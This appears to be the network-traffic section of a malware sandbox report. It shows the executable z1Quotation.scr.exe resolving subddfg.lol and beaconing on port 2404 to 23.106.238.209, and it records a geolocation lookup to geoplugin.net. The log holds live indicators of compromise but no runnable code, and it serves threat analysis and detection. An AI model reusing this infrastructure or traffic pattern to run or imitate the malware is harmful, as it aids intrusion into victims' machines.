                                                                                                                Sep 30, 2024 12:09:14.731007099 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:14.731168985 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:14.778867960 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:14.778924942 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:14.778981924 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:14.779150963 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:14.780349016 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:14.780419111 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:14.780438900 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:14.780607939 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:14.780949116 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:14.843565941 CEST497672404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:14.870285034 CEST24044976323.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.870520115 CEST497632404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:14.990755081 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.991084099 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.991095066 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.991101980 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.991110086 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.991118908 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.991228104 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.991673946 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.991684914 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.991693020 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.991838932 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.991849899 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.991858006 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.991997957 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.992069960 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.992254019 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.992264986 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.992392063 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.992441893 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.992763042 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.992770910 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.992866039 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.993036032 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.993043900 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.993380070 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.993391991 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.993552923 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.993562937 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.993571997 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:14.993688107 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.030924082 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.040553093 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.040565968 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.040575981 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.040585041 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.040602922 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.040749073 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.040761948 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.040771961 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.040882111 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.041776896 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.041790009 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.041882992 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.042006016 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.042131901 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.042145014 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.042207956 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.046525002 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.046727896 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.047988892 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.048132896 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.048464060 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.048629045 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.053644896 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.155782938 CEST24044976723.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.182924032 CEST24044976323.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.183034897 CEST497632404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.292474031 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.308212996 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.308473110 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.308485031 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.308588982 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.308692932 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.308937073 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.309318066 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.309478045 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.309926033 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.309937000 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.310183048 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:15.343295097 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.343478918 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.343533993 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.343583107 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.344922066 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.344976902 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.345033884 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.345202923 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.345544100 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.391918898 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.391977072 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.392033100 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.392206907 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.393373013 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.393429041 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:15.393487930 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.588758945 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.589021921 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.589032888 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.589040995 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.626184940 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.626240015 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.626296997 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.627603054 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.627660990 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.627718925 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.627887011 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.628057003 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.628227949 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.745512962 CEST24044976323.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.745666981 CEST497632404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.778131008 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.827570915 CEST497672404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.838707924 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.838718891 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.838745117 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.838810921 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.838819981 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.838968992 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.838995934 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.840595961 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.840605974 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.840615034 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.840845108 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.840856075 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.841259956 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.841275930 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.841725111 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.842384100 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.888096094 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.888108015 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.888117075 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.888125896 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.888134956 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.888144016 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.889754057 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.889765024 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.889774084 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.889782906 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.889791965 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.889801025 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.889810085 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.889825106 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.889830112 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:16.889877081 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.898097038 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.898169994 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.898212910 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.898379087 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.899502993 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.899559975 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.899619102 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.899786949 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.900127888 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.970366955 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.970426083 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.970483065 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.970650911 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.973397970 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.973448038 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.973501921 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.973555088 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.974396944 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.974447012 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:16.974503040 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.031768084 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.031816006 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.031884909 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.032036066 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.033225060 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.033272982 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.033324003 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.033490896 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.033662081 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.033833027 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.057549953 CEST24044976323.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.057729006 CEST497632404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.140117884 CEST24044976723.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.151601076 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.151920080 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.159544945 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.159913063 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.159986019 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.160038948 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.160216093 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.160298109 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.161042929 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.161122084 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.161175966 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.161223888 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.161271095 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.161314964 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.161634922 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.161719084 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.200716972 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.202071905 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.202203989 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.202518940 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.202689886 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.202852964 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.232464075 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.232551098 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.232599974 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.232646942 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.232697010 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.232743979 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.236068010 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.236146927 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.236234903 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.236289978 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.236336946 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.236385107 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.237070084 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.246217966 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.246335030 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.247687101 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.247793913 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.294241905 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.294321060 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.294362068 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.294403076 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.294461966 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.294518948 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.294560909 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.294729948 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.294785976 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.294831038 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.294878006 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.295109987 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.295181036 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.295228004 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.295272112 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.370532990 CEST24044976323.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.370790005 CEST497632404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.413597107 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.463093996 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.463174105 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.463224888 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.463275909 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.463334084 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.463381052 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.463643074 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.463995934 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.464364052 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.464432955 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.464478970 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.464627028 CEST24044976423.106.238.209192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 30, 2024 12:03:15.037349939 CEST | 192.168.11.20 | 1.1.1.1 | 0xcac9 | Standard query (0) | telesavers.co.za | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:03:16.047183990 CEST | 192.168.11.20 | 9.9.9.9 | 0xcac9 | Standard query (0) | telesavers.co.za | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:03:26.218331099 CEST | 192.168.11.20 | 9.9.9.9 | 0xc015 | Standard query (0) | telesavers.co.za | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:03:36.371994019 CEST | 192.168.11.20 | 9.9.9.9 | 0x30a0 | Standard query (0) | telesavers.co.za | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:03:46.561256886 CEST | 192.168.11.20 | 9.9.9.9 | 0x6cec | Standard query (0) | telesavers.co.za | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:03:56.726649046 CEST | 192.168.11.20 | 9.9.9.9 | 0xd478 | Standard query (0) | telesavers.co.za | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:04:06.880920887 CEST | 192.168.11.20 | 9.9.9.9 | 0xeea0 | Standard query (0) | telesavers.co.za | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:04:17.060866117 CEST | 192.168.11.20 | 9.9.9.9 | 0x8129 | Standard query (0) | telesavers.co.za | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:04:27.220055103 CEST | 192.168.11.20 | 9.9.9.9 | 0x97c4 | Standard query (0) | telesavers.co.za | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:04:37.374366999 CEST | 192.168.11.20 | 9.9.9.9 | 0x186d | Standard query (0) | telesavers.co.za | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:04:47.529191971 CEST | 192.168.11.20 | 9.9.9.9 | 0xc1d2 | Standard query (0) | telesavers.co.za | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:04:57.683650970 CEST | 192.168.11.20 | 1.1.1.1 | 0xf882 | Standard query (0) | telesavers.co.za | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:05:02.717253923 CEST | 192.168.11.20 | 1.1.1.1 | 0xd657 | Standard query (0) | subddfg.lol | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:05:04.591978073 CEST | 192.168.11.20 | 1.1.1.1 | 0x2729 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 30, 2024 12:03:16.198887110 CEST | 9.9.9.9 | 192.168.11.20 | 0xcac9 | Name error (3) | telesavers.co.za | none | none | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:03:16.779160976 CEST | 1.1.1.1 | 192.168.11.20 | 0xcac9 | No error (0) | telesavers.co.za | | 102.65.21.26 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:03:26.368653059 CEST | 9.9.9.9 | 192.168.11.20 | 0xc015 | Name error (3) | telesavers.co.za | none | none | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:03:36.522806883 CEST | 9.9.9.9 | 192.168.11.20 | 0x30a0 | Name error (3) | telesavers.co.za | none | none | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:03:46.719321966 CEST | 9.9.9.9 | 192.168.11.20 | 0x6cec | Name error (3) | telesavers.co.za | none | none | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:03:56.877348900 CEST | 9.9.9.9 | 192.168.11.20 | 0xd478 | Name error (3) | telesavers.co.za | none | none | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:04:07.031667948 CEST | 9.9.9.9 | 192.168.11.20 | 0xeea0 | Name error (3) | telesavers.co.za | none | none | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:04:17.213233948 CEST | 9.9.9.9 | 192.168.11.20 | 0x8129 | Name error (3) | telesavers.co.za | none | none | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:04:27.371959925 CEST | 9.9.9.9 | 192.168.11.20 | 0x97c4 | Name error (3) | telesavers.co.za | none | none | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:04:37.524411917 CEST | 9.9.9.9 | 192.168.11.20 | 0x186d | Name error (3) | telesavers.co.za | none | none | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:04:47.679611921 CEST | 9.9.9.9 | 192.168.11.20 | 0xc1d2 | Name error (3) | telesavers.co.za | none | none | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:04:58.598098993 CEST | 1.1.1.1 | 192.168.11.20 | 0xf882 | No error (0) | telesavers.co.za | | 102.65.21.26 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:05:02.876513958 CEST | 1.1.1.1 | 192.168.11.20 | 0xd657 | No error (0) | subddfg.lol | | 23.106.238.209 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 12:05:04.743925095 CEST | 1.1.1.1 | 192.168.11.20 | 0x2729 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49762 | 178.237.33.50 | 80 | 1412 | C:\Users\user\Desktop\z1Quotation.scr.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 12:05:05.019148111 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Sep 30, 2024 12:05:05.295834064 CEST | 1169 | IN | HTTP/1.1 200 OK
date: Mon, 30 Sep 2024 10:05:05 GMT
server: Apache
content-length: 961
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
